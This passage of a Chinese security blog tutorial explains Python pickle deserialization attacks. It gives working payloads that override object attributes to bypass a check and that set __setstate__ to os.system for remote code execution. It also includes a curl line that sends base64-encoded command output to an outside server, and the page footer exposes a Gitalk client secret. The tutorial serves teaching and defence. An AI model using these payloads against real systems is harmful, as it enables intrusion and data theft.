<li>照抄正常的Student序列化之后的字符串，压入一个正常的<code>student</code>对象，<code>name</code>和<code>grade</code>分别是<code>&#39;B&#39;</code>和<code>&#39;B&#39;</code>由于</li>
</ul>
<p>由于栈顶是正常的<code>student</code>对象（<code>if</code>语句判断用过），<code>pickle.loads</code>会返回正常，于是到手的<code>student</code>对象<code>name</code>和<code>grade</code>都与<code>blue.name</code>、<code>blue.grade</code>对应了</p>
<p><code>payload</code>如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">b'\x80\x03c__main__\nblue\n&#125;(Vname\nVB\nVgrade\nVB\nub0c__main__\nstudent\n)\x81&#125;(X\x04\x00\x00\x00nameX\x01\x00\x00\x00BX\x05\x00\x00\x00gradeX\x01\x00\x00\x00Bub.'</span></span><br></pre></td></tr></table></figure>

<p>其中q指令可省略</p>
<p>把过程输出执行结果如下：</p>
<p><img src="https://i.loli.net/2020/04/06/MNEBqkCznTjKo7L.png" alt=""></p>
<p>可看到成功绕过了判断</p>
<h4 id="setstate"><a href="#setstate" class="headerlink" title="setstate"></a>setstate</h4><p>如果<code>inst</code>有<code>__setstate__</code>方法，则把<code>state</code>交给<code>__setstate__</code>方法来处理，否则的话，直接把<code>state</code>这个<code>dist</code>的内容，合并到<code>inst.__dict__</code>里面</p>
<p><code>__setstate__</code>与<code>__getstate__</code>的关系：<code>pickle</code>一个类的实例时，Python 将只 <code>pickle</code> 当它调用该实例的 <code>getstate()</code> 方法时返回给它的值。类似的，在 <code>unpickle</code> 时，Python 将提供经过 <code>unpickle</code> 的值作为参数传递给实例的 <code>setstate()</code> 方法。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> pickletools</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Foo</span><span class="params">()</span>:</span></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self)</span>:</span></span><br><span class="line">     self.val = <span class="number">2020</span></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">__getstate__</span><span class="params">(self)</span>:</span></span><br><span class="line">     print(<span class="string">"I'm being pickled"</span>)</span><br><span class="line">     self.val *= <span class="number">2</span></span><br><span class="line">     <span class="keyword">return</span> self.__dict__</span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">__setstate__</span><span class="params">(self, d)</span>:</span></span><br><span class="line">     print(<span class="string">"I'm being unpickled with these values:&#123;&#125;"</span>.format(d)) </span><br><span class="line">     self.__dict__ = d</span><br><span class="line">     self.val *= <span class="number">3</span></span><br><span class="line">f = Foo()</span><br><span class="line">f_string = pickle.dumps(f)</span><br><span class="line">print(f_string)</span><br><span class="line">a = pickletools.optimize(f_string)</span><br><span class="line">pickletools.dis(a)</span><br><span class="line">f_new = pickle.loads(f_string)</span><br><span class="line">print(<span class="string">"&#123;&#125;"</span>.format(f_new.val))</span><br></pre></td></tr></table></figure>

<p>代码执行结果如下：</p>
<p><img src="https://i.loli.net/2020/04/07/BvlRWo4qD52exrI.png" alt=""></p>
<p>可看到<code>pickle</code>时执行了<code>__getstate__</code>方法，<code>unpickle</code>时执行了<code>__setstate__</code>方法，且使用了<code>__getstate__</code>方法返回的值</p>
<p>如果当原对象没有<code>__setstate__</code>这个方法的时候，如果我们构造了一个<code>{&#39;__setstate__&#39;: os.system}</code>来<code>BUILD</code>这个对象，就会造成任意代码执行，现在对象的<code>__setstate__</code>就变成了</p>
<p><code>os.system</code>，接下来再次利用<code>dir</code>来<code>BUILD</code>这个对象，就构成了<code>os.system(&#39;dir&#39;)</code>命令执行，实现了RCE</p>
<p><code>payload</code>：<code>b&#39;\x80\x03c__main__\nFoo\n)\x81}(V__setstate__\ncos\nsystem\nubVdir\nb.&#39;</code></p>
<p>有如下代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> pickletools</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Foo</span><span class="params">()</span>:</span></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self)</span>:</span></span><br><span class="line">     self.val = <span class="number">2020</span></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">__getstate__</span><span class="params">(self)</span>:</span></span><br><span class="line">     print(<span class="string">"I'm being pickled"</span>)</span><br><span class="line">     self.val *= <span class="number">2</span></span><br><span class="line">     <span class="keyword">return</span> self.__dict__</span><br><span class="line">f = Foo()</span><br><span class="line">f_string = pickle.dumps(f)</span><br><span class="line">print(f_string)</span><br><span class="line">a = pickletools.optimize(f_string)</span><br><span class="line">pickletools.dis(a)</span><br><span class="line">f_new = pickle.loads(f_string)</span><br><span class="line">print(<span class="string">"&#123;&#125;"</span>.format(f_new.val))</span><br><span class="line">d = <span class="string">b'\x80\x03c__main__\nFoo\n)\x81&#125;(V__setstate__\ncos\nsystem\nubVdir\nb.'</span></span><br><span class="line">c = pickletools.optimize(d)</span><br><span class="line">pickletools.dis(c)</span><br><span class="line">pickle.loads(c)</span><br></pre></td></tr></table></figure>

<p>执行结果如下：</p>
<p><img src="https://i.loli.net/2020/04/07/aPhj3tYKCT1Vo9z.png" alt=""></p>
<p>可见成功执行了命令</p>
<p>完整payload如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">b'\x80\x03c__main__\nFoo\n)\x81&#125;(V__setstate__\ncos\nsystem\nubVdir\nb0c__main__\nFoo\nq\x00)\x81q\x01&#125;q\x02X\x03\x00\x00\x00valq\x03K\x04sb.'</span></span><br></pre></td></tr></table></figure>

<p>恶意代码执行完后将栈弹空，然后压一个正常的<code>student</code>入栈</p>
<h3 id="细节"><a href="#细节" class="headerlink" title="细节"></a>细节</h3><p>其他模块的load也可以触发pickle反序列化漏洞。例如：<code>numpy.load()</code>先尝试以numpy自己的数据格式导入；如果失败，则尝试以pickle的格式导入。因此<code>numpy.load()</code>也可以触发pickle反序列化漏洞。</p>
<p>即使代码中没有<code>import os</code>，GLOBAL指令也可以自动导入<code>os.system</code>。因此，不能认为“我不在代码里面导入os库，pickle反序列化的时候就不能执行os.system”。</p>
<p>即使没有回显，也可以很方便地调试恶意代码。只需要拥有一台公网服务器，执行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">os.system(&#39;curl your_server&#x2F;&#96;ls &#x2F; | base64&#96;&#39;)</span><br></pre></td></tr></table></figure>

<p>然后查询您自己的服务器日志，就能看到结果。这是因为：以反引号包含的代码，在sh中会直接执行，返回其结果。</p>
<h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><ul>
<li><a href="https://zhuanlan.zhihu.com/p/89132768" target="_blank" rel="noopener">https://zhuanlan.zhihu.com/p/89132768</a></li>
<li><a href="https://mp.weixin.qq.com/s/3CLh1V9FZ36-Tw9ikUSsaA" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/3CLh1V9FZ36-Tw9ikUSsaA</a></li>
<li><a href="https://www.cnblogs.com/cioi/p/12464592.html" target="_blank" rel="noopener">https://www.cnblogs.com/cioi/p/12464592.html</a></li>
</ul>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Extrader</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://www.extrader.top/2020/04/05/Python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B5%85%E6%9E%90/">https://www.extrader.top/2020/04/05/Python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B5%85%E6%9E%90/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://www.extrader.top">Extrader</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/python/">python</a><a class="post-meta__tags" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">反序列化</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/04/08/Python-%E7%BD%91%E7%BB%9C%E7%BC%96%E7%A8%8B/"><i class="fa fa-chevron-left">  </i><span>Python-网络编程</span></a></div><div class="next-post pull-right"><a href="/2020/04/02/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"><span>反序列化</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="gitalk-container"></div><script>var gitalk = new Gitalk({
  clientID: 'dcbaba23dd5d2cbb1cc2',
  clientSecret: '39bc1e41152f9936638fa5d9f2c542ac945d9fe1',
  repo: 'Extrader-home.github.io',
  owner: 'Extrader-home',
  admin: 'Extrader-home',
  id: md5(decodeURI(location.pathname)),
  language: 'zh-CN'
})
gitalk.render('gitalk-container')</script></div></div><footer class="footer-bg" style="background-image: url(https://i.loli.net/2020/04/07/inGFRJtlS8c5BbH.png)"><div class="layout" id="footer"><div class="copyright">&copy;2020 By Extrader</div><div class="framework-info"><span>驱动 - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.7.0"></script><script src="/js/fancybox.js?version=1.7.0"></script><script src="/js/sidebar.js?version=1.7.0"></script><script src="/js/copy.js?version=1.7.0"></script><script src="/js/fireworks.js?version=1.7.0"></script><script src="/js/transition.js?version=1.7.0"></script><script src="/js/scroll.js?version=1.7.0"></script><script src="/js/head.js?version=1.7.0"></script><script src="/js/search/local-search.js"></script><script id="ribbon" src="/js/third-party/canvas-ribbon.js" size="90" alpha="0.6" zIndex="-1" data-click="true"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>